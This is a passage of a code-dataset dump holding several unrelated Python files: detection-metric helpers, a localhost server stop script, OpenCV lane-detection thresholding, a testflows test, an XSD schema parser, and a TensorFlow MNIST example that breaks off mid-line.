not valid. Valid metrics: {self.__valid_metrics}\")\n return False\n\n def _support_precision_score(self, tp, tp_norm, fp):\n np.warnings.filterwarnings('ignore')\n try:\n precision = tp / (tp + fp)\n precision_norm = tp_norm / (tp_norm + fp)\n except ZeroDivisionError:\n precision = 0\n precision_norm = 0\n\n if np.isnan(precision):\n precision = 0\n precision_norm = 0\n return precision, precision_norm\n\n def _support_recall_score(self, tp, tp_norm, fn):\n np.warnings.filterwarnings('ignore')\n try:\n recall = tp / (tp + fn)\n recall_norm = tp_norm / (tp_norm + fn)\n except ZeroDivisionError:\n recall = 0\n recall_norm = 0\n\n if np.isnan(recall):\n recall = 0\n recall_norm = 0\n return recall, recall_norm\n\n def _support_f1_score(self, tp, tp_norm, fp, fn):\n np.warnings.filterwarnings('ignore')\n precision, precision_norm = self._support_precision_score(tp, tp_norm, fp)\n recall, recall_norm = self._support_recall_score(tp, tp_norm, fn)\n try:\n f1 = 2 * precision * recall / (precision + recall)\n f1_norm = 2 * precision_norm * recall_norm / (precision_norm + recall_norm)\n except ZeroDivisionError:\n f1 = 0\n f1_norm = 0\n if np.isnan(f1):\n f1 = 0\n f1_norm = 0\n return f1, f1_norm\n\n def _support_precision_recall(self, n_anns, n_normalized, confidence, tp, fp):\n tp_norm = np.multiply(tp, n_normalized) / n_anns\n precision = np.true_divide(tp, np.add(tp, fp))\n recall = np.true_divide(tp, n_anns)\n fn = n_anns - tp[-1]\n\n np.warnings.filterwarnings('ignore')\n recall_norm = np.true_divide(tp_norm, tp_norm + fn)\n precision_norm = np.true_divide(tp_norm, np.add(tp_norm, fp))\n\n precision = np.nan_to_num(precision)\n precision_norm = np.nan_to_num(precision_norm)\n recall = np.nan_to_num(recall)\n recall_norm = np.nan_to_num(recall_norm)\n\n # same threshold, same value\n thresholds = np.unique(confidence)\n rel_indexes = []\n for t in thresholds:\n indexes = np.where(confidence == t)[0]\n for i in indexes:\n precision[i] = precision[indexes[-1]]\n precision_norm[i] = precision_norm[indexes[-1]]\n recall[i] = recall[indexes[-1]]\n recall_norm[i] = recall_norm[indexes[-1]]\n rel_indexes.append(indexes[0])\n\n return precision, precision_norm, recall, recall_norm, rel_indexes\n\n def _support_precision_recall_auc(self, n_gt, n_tot, n_normalized, confidence, tp, fp, is_classification):\n precision, precision_norm, recall, recall_norm, rel_indexes = self._support_precision_recall(n_tot,\n n_normalized,\n confidence, tp, fp)\n one = np.ones(1)\n zero = np.zeros(1)\n precision = np.concatenate([one, precision[np.sort(rel_indexes)]])\n precision_norm = np.concatenate([one, precision_norm[np.sort(rel_indexes)]])\n recall = np.concatenate([zero, recall[np.sort(rel_indexes)]])\n recall_norm = np.concatenate([zero, recall_norm[np.sort(rel_indexes)]])\n\n recall = np.flip(recall)\n recall_norm = np.flip(recall_norm)\n precision = np.flip(precision)\n precision_norm = np.flip(precision_norm)\n\n if recall[0] != 1:\n p_value = np.zeros(1)\n if is_classification:\n p_value[0] = n_tot / n_gt\n else:\n p_value[0] = 0 # set 0 in od\n recall = np.concatenate([one, recall])\n recall_norm = np.concatenate([one, recall_norm])\n precision = np.concatenate([p_value, precision])\n if is_classification:\n p_value[0] = n_normalized / (n_normalized + (n_gt - n_tot))\n else:\n p_value[0] = 0 # set 0 in od\n precision_norm = np.concatenate([p_value, precision_norm])\n\n indexes = []\n v_r = -1\n v_p = -1\n index_one_recall = -1\n for i in range(0, len(recall)):\n if recall[i] == 1:\n if precision[i] > v_p:\n v_p = precision[i]\n index_one_recall = i\n try:\n if recall[i+1] != 1:\n indexes.append(index_one_recall)\n except IndexError:\n indexes.append(index_one_recall)\n else:\n if recall[i] == v_r:\n if precision[i] == v_p:\n continue\n v_r = recall[i]\n v_p = precision[i]\n indexes.append(i)\n\n recall = recall[indexes]\n precision = precision[indexes]\n recall_norm = recall_norm[indexes]\n precision_norm = precision_norm[indexes]\n return precision, precision_norm, recall, recall_norm\n\n def _support_f1_curve(self, det_ord, precision, precision_norm, recall, recall_norm, rel_indexes):\n f1 = 2 * np.divide(np.multiply(precision, recall), np.add(precision, recall))\n f1_norm = 2 * np.divide(np.multiply(precision_norm, recall_norm), np.add(precision_norm, recall_norm))\n thresholds = det_ord[np.sort(rel_indexes)]\n f1 = f1[np.sort(rel_indexes)]\n f1_norm = f1_norm[np.sort(rel_indexes)]\n\n one = np.ones(1)\n zero = np.zeros(1)\n if thresholds[0] != 1:\n thresholds = np.concatenate([one, thresholds])\n f1 = np.concatenate([zero, f1])\n f1_norm = np.concatenate([zero, f1_norm])\n if thresholds[-1] != 0:\n thresholds = np.concatenate([thresholds, zero])\n tmp_value = np.zeros(1)\n tmp_value[0] = f1[-1]\n f1 = np.concatenate([f1, tmp_value])\n tmp_value[0] = f1_norm[-1]\n f1_norm = np.concatenate([f1_norm, tmp_value])\n\n f1 = np.flip(f1)\n f1_norm = np.flip(f1_norm)\n thresholds = np.flip(thresholds)\n\n f1 = np.nan_to_num(f1)\n f1_norm = np.nan_to_num(f1_norm)\n\n if self._use_normalization:\n return thresholds, f1_norm\n else:\n return thresholds, f1\n\n def _support_average_precision(self, n_gt, n_tot, n_normalized, confidence, tp, fp, is_classification):\n precision, precision_norm, recall, recall_norm = self._support_precision_recall_auc(n_gt, n_tot, n_normalized,\n confidence, tp, fp,\n is_classification)\n std_err = np.std(precision) / np.sqrt(len(precision))\n std_err_norm = np.std(precision_norm) / np.sqrt(len(precision_norm))\n\n ap = -np.sum(np.multiply(np.diff(recall), precision[:-1]))\n ap_norm = -np.sum(np.multiply(np.diff(recall_norm), precision_norm[:-1]))\n\n if self._use_normalization:\n return ap_norm, std_err_norm\n else:\n return ap, std_err\n\n def _are_valid_categories(self, categories):\n if len(categories) == 0:\n logger.error(f\"Empty categories list.\")\n return False\n for c in categories:\n if c not in self.dataset.get_categories_names():\n logger.error(f\"Category '{c}' not valid\")\n return False\n return True\n\n def _are_valid_properties(self, properties):\n if len(properties) == 0:\n logger.error(f\"Empty properties list.\")\n return False\n for p in properties:\n if p not in self.dataset.get_property_keys():\n logger.error(f\"Property '{p}' not valid.\")\n return False\n return True\n\n def _is_valid_property(self, property_name, possible_values):\n if property_name in self.dataset.get_property_keys():\n if len(possible_values) == 0:\n logger.error(f\"Empty possible values list\")\n return False\n for value in possible_values:\n if value not in self.dataset.get_values_for_property(property_name):\n logger.error(f\"Property value '{value}' not valid for property '{property_name}'\")\n return False\n else:\n logger.error(f\"Property '{property_name}' not valid\")\n return False\n return True\n\n def __is_valid_curve(self, curve):\n if curve not in self.__valid_curves:\n logger.error(f\"Curve '{curve}' not valid\")\n return False\n return True\n\n def __create_norm_factors_dict(self, norm_factor_classes, norm_factors_properties):\n norm_factors = {}\n if norm_factor_classes is None:\n norm_factors[\"categories\"] = 1 / len(self.dataset.get_categories_names())\n else:\n norm_factors[\"categories\"] = norm_factor_classes\n if norm_factors_properties is None:\n for p_name in self.dataset.get_property_keys():\n norm_factors[p_name] = 1 / len(self.dataset.get_values_for_property(p_name))\n else:\n p_names = np.array(norm_factors_properties)[:, 0]\n dataset_p_names = self.dataset.get_property_keys()\n remaining_p_names = dataset_p_names - p_names\n for p_name, p_value in norm_factors_properties:\n if p_name in dataset_p_names:\n norm_factors[p_name] = p_value\n else:\n logger.warn(\"Invalid property name in 'norm_factors_properties'.\")\n for p_name in remaining_p_names:\n norm_factors[p_name] = 1 / len(self.dataset.get_values_for_property(p_name))\n return norm_factors\n\n @abc.abstractmethod\n def analyze_false_positive_error_for_category(self, category, categories, metric=None):\n pass\n\n @abc.abstractmethod\n def show_distribution_of_property(self, property_name):\n pass\n\n @abc.abstractmethod\n def analyze_reliability(self, categories=None, num_bins=10):\n pass\n\n @abc.abstractmethod\n def _compute_curve_for_categories(self, categories, curve):\n pass\n\n @abc.abstractmethod\n def _get_normalized_number_of_images(self):\n pass\n\n @abc.abstractmethod\n def _set_normalized_number_of_images_for_categories(self):\n \"\"\"Normalizes the number of images based on the normalization factor of the categories\"\"\"\n pass\n\n @abc.abstractmethod\n def _set_normalized_number_of_images_for_property_for_categories(self, property_name):\n \"\"\"Normalizes the number of images based on the normalization factor of the specified property and the\n normalization factor of the categories\n\n Parameters\n ----------\n property_name: string\n Property name to which the images should be normalized\n \"\"\"\n pass\n\n @abc.abstractmethod\n def _compute_metric(self, gt, detections, matching, metric, is_micro_required=False):\n pass\n\n def _evaluation_metric(self, gt, detections, matching, is_micro_required=False):\n raise NotImplementedError\n\n @abc.abstractmethod\n def _calculate_metric_for_category(self, category, metric):\n pass\n\n @abc.abstractmethod\n def _calculate_metric_for_properties_of_category(self, category_name, category_id, property_name, possible_values,\n matching, metric):\n pass\n\n @abc.abstractmethod\n def _analyze_false_positive_errors(self, categories):\n pass\n\n @abc.abstractmethod\n def _get_input_report(self, properties, show_properties_report):\n pass\n\n @abc.abstractmethod\n def _calculate_report_for_metric(self, input_report, categories, properties, show_categories, show_properties,\n metric):\n pass\n\n @abc.abstractmethod\n def _compute_metric_precision_score(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _compute_metric_recall_score(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _compute_metric_f1_score(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _compute_precision_recall_auc_curve(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _compute_f1_auc_curve(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _calculate_reliability(self, y_true, y_pred, y_score, num_bins):\n pass\n\n @abc.abstractmethod\n def _support_metric_threshold(self, n_true_gt, n_normalized, gt_ord, det_ord, tp, fp, threshold):\n pass\n\n @abc.abstractmethod\n def _compute_average_precision_score(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _support_metric(self, gt, detections, matching):\n pass\n","sub_path":"odin/classes/analyzer_interface.py","file_name":"analyzer_interface.py","file_ext":"py","file_size_in_byte":29844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"231773545","text":"from argparse import ArgumentParser\nimport requests\nimport ujson as json\n\n\ndef parse_args():\n ap = ArgumentParser()\n ap.add_argument('--server_host', type=str, default='localhost',\n help='Server host.')\n ap.add_argument('--server_port', type=int, default=1337, \n help='Server port.')\n return ap.parse_args()\n\n\ndef run(args):\n url = 'http://%s:%d/stop' % (args.server_host, args.server_port)\n ret = requests.post(url)\n print('Status code: %d' % ret.status_code)\n print('Body: %s' % ret.text)\n\n\nif __name__ == '__main__':\n run(parse_args())\n","sub_path":"py/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"594655371","text":"#%%\nimport numpy as np\nimport cv2\nimport glob\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\ndef abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255, kernel=3):\n \n # Apply the following steps to img\n # 1) Convert to grayscale\n # 2) Take the derivative in x or y given orient = 'x' or 'y'\n # 3) Take the absolute value of the derivative or gradient\n # 4) Scale to 8-bit (0 - 255) then convert to type = np.uint8\n # 5) Create a mask of 1's where the scaled gradient magnitude \n # is > thresh_min and < thresh_max\n # 6) Return this mask as your binary_output image\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n if orient == 'x':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=kernel))\n\n if orient == 'y':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=kernel))\n\n scaled_sobel = np.uint8(255*abs_sobel/np.max(abs_sobel))\n binary_output = np.zeros_like(scaled_sobel)\n binary_output[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1\n\n return binary_output\n\ndef mag_threshold(img, sobel_kernel=3, mag_thresh=(0, 255)):\n \n # Apply the following steps to img\n # 1) Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n # 2) Take the gradient in x and y separately\n sobelX = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobelY = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n \n # 3) Calculate the magnitude\n gradmag = np.sqrt(sobelX**2 + sobelY**2)\n \n # 4) Scale to 8-bit (0 - 255) and convert to type = np.uint8\n scale_factor = np.max(gradmag)/255\n gradmag = (gradmag/scale_factor).astype(np.uint8)\n\n # 5) Create a binary mask where mag thresholds are met\n binary_output = np.zeros_like(gradmag)\n binary_output[(gradmag >= mag_thresh[0]) & (gradmag <= mag_thresh[1])] = 1\n\n # 6) Return this mask as your binary_output image\n return binary_output\n\ndef dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):\n \n # Apply the following steps to img\n # 1) Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # 2) Take the gradient in x and y separately\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # 3) Take the absolute value of the x and y gradients\n # 4) Use np.arctan2(abs_sobely, abs_sobelx) to calculate the direction of the gradient \n absgraddir = np.arctan2(np.absolute(sobely), np.absolute(sobelx))\n # 5) Create a binary mask where direction thresholds are met\n binary_output = np.zeros_like(absgraddir)\n binary_output[(absgraddir >= thresh[0]) & (absgraddir <= thresh[1])] = 1\n # 6) Return this mask as your binary_output image\n return binary_output\n\ndef colorBinary(hsv, low, high):\n h = hsv[:,:,0]\n s = hsv[:,:,1]\n v = hsv[:,:,2]\n \n h_binary = np.zeros_like(h)\n h_binary[(h >= low[0]) & (h <= high[0])] = 1\n\n s_binary = np.zeros_like(s)\n s_binary[(s >= low[1]) & (s <= high[1])] = 1\n\n v_binary = np.zeros_like(v)\n v_binary[(v >= low[2]) & (v <= high[2])] = 1\n\n color_binary = np.zeros_like(h)\n color_binary[(h_binary == 1) & (s_binary == 1) & (v_binary == 1)] = 1\n return color_binary\n\ndef processColorGradient(img, s_thresh=(170, 255), h_thresh=(15, 100), sx_thresh=(20, 100), sy_thresh=(40, 100), mag_thresh=(40, 100), dir_thresh=(0, np.pi/2), kernel=3):\n img = np.copy(img)\n \n sxbinary = abs_sobel_thresh(img, orient='x', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], kernel=kernel)\n sybinary = abs_sobel_thresh(img, orient='y', thresh_min=sy_thresh[0], thresh_max=sy_thresh[1], kernel=kernel)\n mag_binary = mag_threshold(img, sobel_kernel=kernel, mag_thresh=mag_thresh)\n dir_binary = dir_threshold(img, sobel_kernel=kernel, thresh=dir_thresh)\n \n # Convert to HLS color space and separate the V channel\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n h_channel = hls[:,:,0]\n s_channel = hls[:,:,2]\n \n # Threshold color channel\n h_binary = np.zeros_like(h_channel)\n h_binary[(h_channel >= h_thresh[0]) & (h_channel <= h_thresh[1])] = 1\n\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1\n\n # Identify Yellow and White color by HSV\n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n yellow = colorBinary(hsv, (5, 100, 100), (75, 255, 255))\n white = colorBinary(hsv, (19, 0, 255-72), (255, 72, 255))\n\n # Stack each channel\n color_binary = np.dstack(( np.zeros_like(sxbinary), s_binary, h_binary, sxbinary, sybinary, mag_binary, dir_binary)) * 255\n yorw = np.zeros_like(sxbinary)\n yorw[(yellow == 1) | (white == 1)] = 1\n \n # Combine the binary thresholds\n combined_binary = np.zeros_like(sxbinary)\n combined_binary[ (yorw == 1) & (((s_binary == 1) & (h_binary == 1)) | ((sxbinary == 1) & (sybinary == 1)) | ((mag_binary == 1) & (dir_binary == 1))) ] = 1\n return color_binary, combined_binary\n\n#%%\nimport re\n# Color Transfrom, Gradient with threshold\n\nimages = glob.glob('../output_images/Undist/test*_undist.jpg')\npattern = re.compile('/output_images/Undist/(.*)_undist.jpg')\n\nfor fname in images:\n image = mpimg.imread(fname)\n result, combined = processColorGradient(image, \n s_thresh=(170, 250), h_thresh=(15, 100), \n sx_thresh=(20, 100), sy_thresh=(0, 255), \n mag_thresh=(30, 100), dir_thresh=(np.pi*30/180, np.pi*75/180), \n kernel=3)\n name = pattern.search(fname).group(1)\n path = '../output_images/' + name + '_color-gradient.jpg' \n # path = '../output_images/test2_color-gradient.jpg' \n mpimg.imsave(path, combined, cmap='gray')","sub_path":"Code/color-gradient.py","file_name":"color-gradient.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"299712091","text":"#!/usr/bin/python3\nfrom testflows.core import *\nfrom testflows.asserts import error\nfrom testflows._core.objects import Result\n\n\n@TestSuite\ndef my_suite(self):\n with Scenario(\"my inner test\"):\n fail(\"failed\")\n\n\n@TestScenario\ndef my_test(self):\n ok(\"success\")\n\n\n@TestOutline\ndef check_result(self, test, flags=None):\n with Check(\"running the test\"):\n r = Scenario(test=test, flags=Flags(flags))()\n\n with Then(\"the result object should be returned\"):\n assert isinstance(r, Result), error(\"not a result object\")\n\n with And(\"start_time should be set\"):\n assert r.start_time is not None, error(\"start_time should not be None\")\n\n with And(\"test_time should be set\"):\n assert r.test_time is not None, error(\"test_time should not be None\")\n\n\n@TestFeature\ndef feature(self):\n \"\"\"Check returned result objects.\"\"\"\n with Example(\"scenario result object\"):\n check_result(test=my_test)\n\n with Example(\"suite result object\"):\n check_result(test=my_suite, flags=XFAIL)\n\n\nif main():\n feature()\n","sub_path":"tests/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"473463322","text":"import sys\nfrom dataclasses import dataclass\nfrom dataclasses import field\nfrom typing import Any\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import TypeVar\nfrom urllib.parse import urljoin\n\nfrom lxml.etree import Element\nfrom lxml.etree import QName\n\nfrom xsdata.formats.dataclass.parsers.nodes import XmlNode\nfrom xsdata.formats.dataclass.parsers.xml import XmlParser\nfrom xsdata.models import xsd\nfrom xsdata.models.enums import FormType\nfrom xsdata.models.enums import Mode\nfrom xsdata.models.enums import Namespace\nfrom xsdata.models.mixins import ElementBase\n\nT = TypeVar(\"T\")\nParsedObjects = List[Tuple[QName, Any]]\nXmlNodes = List[XmlNode]\n\n\n@dataclass\nclass SchemaParser(XmlParser):\n \"\"\"\n A simple parser to convert an xsd schema to an easy to handle data\n structure based on dataclasses.\n\n The parser is a dummy as possible but it will try to normalize\n certain things like apply parent properties to children.\n\n :param schema_location:\n :param element_form:\n :param attribute_form:\n :param target_namespace:\n :param default_attributes:\n :param default_open_content:\n \"\"\"\n\n location: Optional[str] = field(default=None)\n element_form: Optional[FormType] = field(init=False, default=None)\n attribute_form: Optional[FormType] = field(init=False, default=None)\n target_namespace: Optional[str] = field(default=None)\n default_attributes: Optional[str] = field(default=None)\n default_open_content: Optional[xsd.DefaultOpenContent] = field(default=None)\n\n def dequeue(self, element: Element, queue: XmlNodes, objects: ParsedObjects) -> Any:\n \"\"\"Override parent method to set element index and namespaces map.\"\"\"\n obj: Any = super().dequeue(element, queue, objects)\n\n if isinstance(obj, ElementBase):\n obj.index = element.sourceline\n self.set_namespace_map(element, obj)\n return obj\n\n def start_schema(self, element: Element, item: XmlNode):\n \"\"\"Collect the schema's default form for attributes and elements for\n later usage.\"\"\"\n\n self.element_form = element.attrib.get(\"elementFormDefault\", None)\n self.attribute_form = element.attrib.get(\"attributeFormDefault\", None)\n self.default_attributes = element.attrib.get(\"defaultAttributes\", None)\n\n def set_schema_forms(self, obj: xsd.Schema):\n \"\"\"\n Set the default form type for elements and attributes.\n\n Global elements and attributes are by default qualified.\n \"\"\"\n if self.element_form:\n obj.element_form_default = FormType(self.element_form)\n if self.attribute_form:\n obj.attribute_form_default = FormType(self.attribute_form)\n\n for child_element in obj.elements:\n child_element.form = FormType.QUALIFIED\n\n for child_attribute in obj.attributes:\n child_attribute.form = FormType.QUALIFIED\n\n def set_schema_namespaces(self, obj: xsd.Schema, element: Element):\n \"\"\"Set the given schema's target namespace and add the default\n namespaces if the are missing xsi, xlink, xml, xs.\"\"\"\n obj.target_namespace = obj.target_namespace or self.target_namespace\n\n self.set_namespace_map(element, obj)\n\n @staticmethod\n def set_namespace_map(element: Element, obj: ElementBase):\n \"\"\"Add common namespaces like xml, xsi, xlink if they are missing.\"\"\"\n obj.ns_map = {prefix: uri for prefix, uri in element.nsmap.items() if uri}\n namespaces = obj.ns_map.values()\n for namespace in Namespace:\n if namespace.uri not in namespaces:\n obj.ns_map[namespace.prefix] = namespace.uri\n\n @staticmethod\n def add_default_imports(obj: xsd.Schema):\n \"\"\"Add missing imports to the standard schemas if the namespace is\n declared and.\"\"\"\n imp_namespaces = [imp.namespace for imp in obj.imports]\n xsi_ns = Namespace.XSI.value\n if xsi_ns in obj.ns_map.values() and xsi_ns not in imp_namespaces:\n obj.imports.insert(0, xsd.Import(namespace=xsi_ns))\n\n def resolve_schemas_locations(self, obj: xsd.Schema):\n \"\"\"Resolve the locations of the schema overrides, redefines, includes\n and imports relatively to the schema location.\"\"\"\n if not self.location:\n return\n\n obj.location = self.location\n for over in obj.overrides:\n over.location = self.resolve_path(over.schema_location)\n\n for red in obj.redefines:\n red.location = self.resolve_path(red.schema_location)\n\n for inc in obj.includes:\n inc.location = self.resolve_path(inc.schema_location)\n\n for imp in obj.imports:\n imp.location = self.resolve_local_path(imp.schema_location, imp.namespace)\n\n def resolve_path(self, location: Optional[str]) -> Optional[str]:\n \"\"\"Resolve the given location string relatively the schema location\n path.\"\"\"\n\n return urljoin(self.location, location) if self.location and location else None\n\n def resolve_local_path(\n self, location: Optional[str], namespace: Optional[str]\n ) -> Optional[str]:\n \"\"\"Resolve the given namespace to one of the local standard schemas or\n fallback to the external file path.\"\"\"\n\n common_ns = Namespace.get_enum(namespace)\n if common_ns:\n return common_ns.location\n\n return self.resolve_path(location)\n\n def end_attribute(self, obj: T, element: Element):\n \"\"\"Assign the schema's default form for attributes if the given\n attribute form is None.\"\"\"\n if isinstance(obj, xsd.Attribute) and obj.form is None and self.attribute_form:\n obj.form = FormType(self.attribute_form)\n\n def end_complex_type(self, obj: T, element: Element):\n \"\"\"Prepend an attribute group reference when default attributes\n apply.\"\"\"\n if not isinstance(obj, xsd.ComplexType):\n return\n\n if obj.default_attributes_apply and self.default_attributes:\n attribute_group = xsd.AttributeGroup(ref=self.default_attributes)\n obj.attribute_groups.insert(0, attribute_group)\n\n if not obj.open_content:\n obj.open_content = self.default_open_content\n\n def end_default_open_content(self, obj: T, element: Element):\n \"\"\"Set the instance default open content to be used later as a property\n for all extensions and restrictions.\"\"\"\n if isinstance(obj, xsd.DefaultOpenContent):\n if obj.any and obj.mode == Mode.SUFFIX:\n obj.any.index = sys.maxsize\n\n self.default_open_content = obj\n\n def end_element(self, obj: T, element: Element):\n \"\"\"Assign the schema's default form for elements if the given element\n form is None.\"\"\"\n if isinstance(obj, xsd.Element) and obj.form is None and self.element_form:\n obj.form = FormType(self.element_form)\n\n def end_extension(self, obj: T, element: Element):\n \"\"\"Set the open content if any to the given extension.\"\"\"\n if isinstance(obj, xsd.Extension) and not obj.open_content:\n obj.open_content = self.default_open_content\n\n @classmethod\n def end_open_content(cls, obj: T, element: Element):\n \"\"\"Adjust the index to trick later processors into putting attributes\n derived from this open content last in classes.\"\"\"\n if isinstance(obj, xsd.OpenContent):\n if obj.any and obj.mode == Mode.SUFFIX:\n obj.any.index = sys.maxsize\n\n def end_restriction(self, obj: T, element: Element):\n \"\"\"Set the open content if any to the given restriction.\"\"\"\n if isinstance(obj, xsd.Restriction) and not obj.open_content:\n obj.open_content = self.default_open_content\n\n def end_schema(self, obj: T, element: Element):\n \"\"\"Normalize various properties for the schema and it's children.\"\"\"\n if isinstance(obj, xsd.Schema):\n self.set_schema_forms(obj)\n self.set_schema_namespaces(obj, element)\n self.add_default_imports(obj)\n self.resolve_schemas_locations(obj)\n","sub_path":"xsdata/codegen/parsers/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":8162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"264294254","text":"#!/usr/bin/env python\n# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport argparse\nimport math\nimport os\nimport time\n\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\n\n# Define some constants.\n# The MNIST dataset has 10 classes, representing the digits 0 through 9.\nNUM_CLASSES = 10\n# The MNIST images are always 28x28 pixels.\nIMAGE_SIZE = 28\nIMAGE_PIXELS = IMAGE_SIZE * IMAGE_SIZE\n# Batch size. Must be evenly dividable by dataset sizes.\nBATCH_SIZE = 100\nEVAL_BATCH_SIZE = 3\n# Number of units in hidden layers.\nHIDDEN1_UNITS = 128\nHIDDEN2_UNITS = 32\n\nFLAGS = None\n\n\n# data_sets = read_data_sets(FLAGS.data_dir, False)\n\n\n# Build inference graph.\ndef mnist_inference(images, hidden1_units, hidden2_units):\n \"\"\"Build the MNIST model up to where it may be used for inference.\n Args:\n images: Images placeholder.\n hidden1_units: Size of the first hidden layer.\n hidden2_units: Size of the second hidden layer.\n Returns:\n logits: Output tensor with the computed logits.\n \"\"\"\n # Hidden 1\n with tf.name_scope('hidden1'):\n weights = tf.Variable(\n tf.truncated_normal([IMAGE_PIXELS, hidden1_units],\n stddev=1.0 / math.sqrt(float(IMAGE_PIXELS))),\n name='weights')\n biases = tf.Variable(tf.zeros([hidden1_units]),\n name='biases')\n hidden1 = tf.nn.relu(tf.matmul(images, weights) + biases)\n # Hidden 2\n with tf.name_scope('hidden2'):\n weights = tf.Variable(\n tf.truncated_normal([hidden1_units, hidden2_units],\n stddev=1.0 / math.sqrt(float(hidden1_units))),\n name='weights')\n biases = tf.Variable(tf.zeros([hidden2_units]),\n name='biases')\n hidden2 = tf.nn.relu(tf.matmul(hidden1, weights) + biases)\n # Linear\n with tf.name_scope('softmax_linear'):\n weights = tf.Variable(\n tf.truncated_normal([hidden2_units, NUM_CLASSES],\n stddev=1.0 / math.sqrt(float(hidden2_units))),\n name='weights')\n biases = tf.Variable(tf.zeros([NUM_CLASSES]),\n name='biases')\n logits = tf.matmul(hidden2, weights) + biases\n\n # Uncomment the following line to see what we have constructed.\n tf.train.write_graph(tf.get_default_graph().as_graph_def(),\n \"/tmp\", \"inference.pbtxt\", as_text=True)\n return logits\n\n\n# Build training graph.\ndef mnist_training(logits, labels, learning_rate):\n \"\"\"Build the training graph.\n\n Args:\n logits: Logits tensor, float - [BATCH_SIZE, NUM_CLASSES].\n labels: Labels tensor, int32 - [BATCH_SIZE], with values in the\n range [0, NUM_CLASSES).\n learning_rate: The learning rate to use for gradient descent.\n Returns:\n train_op: The Op for training.\n loss: The Op for calculating loss.\n \"\"\"\n # Create an operation that calculates loss.\n labels = tf.to_int64(labels)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits, labels, name='xentropy')\n loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')\n # Create the gradient descent optimizer with the given learning rate.\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n # Create a variable to track the global step.\n global_step = tf.Variable(0, name='global_step', trainable=False)\n # Use the optimizer to apply the gradients that minimize the loss\n # (and also increment the global step counter) as a single training step.\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n # Uncomment the following line to see what we have constructed.\n # tf.train.write_graph(tf.get_default_graph().as_graph_def(),\n # \"/tmp\", \"train.pbtxt\", as_text=True)\n\n return train_op, loss\n\n\ndef main(_):\n \"\"\"Build the full graph for feeding inputs, training, and\n saving checkpoints. Run the training. Then, load the saved graph and\n run some predictions.\"\"\"\n\n # Get input data: get the sets of images and labels for training,\n # validation, and test on MNIST.\n data_sets = read_data_sets(FLAGS.data_dir, False)\n\n mnist_graph = tf.Graph()\n with mnist_graph.as_default():\n # Generate placeholders for the images and labels.\n images_placeholder = tf.placeholder(tf.float32)\n labels_placeholder = tf.placeholder(tf.int32)\n tf.add_to_collection(\"images\", images_placeholder) # Remember this Op.\n tf.add_to_collection(\"labels\", labels_placeholder) # Remember this Op.\n\n # Build a Graph that computes predictions from the inference model.\n logits = mnist_inference(images_placeholder,\n HIDDEN1_UNITS,\n HIDDEN2_UNITS)\n tf.add_to_collection(\"logits\", logits) # Remember this Op.\n\n # Add to the Graph the Ops that calculate and apply gradients.\n train_op, loss = mnist_training(\n logits, labels_placeholder, 0.01)\n\n # prediction accuracy\n _, indices_op = tf.nn.top_k(logits)\n flattened = tf.reshape(indices_op, [-1])\n correct_prediction = tf.cast(\n tf.equal(labels_placeholder, flattened), tf.float32)\n accuracy = tf.reduce_mean(correct_prediction)\n\n # Define info to be used by the SummaryWriter. This will let\n # TensorBoard plot values during the training process.\n loss_summary = tf.scalar_summary(\"loss\", loss)\n acc_summary = tf.scalar_summary(\"accuracy\", accuracy)\n train_summary_op = 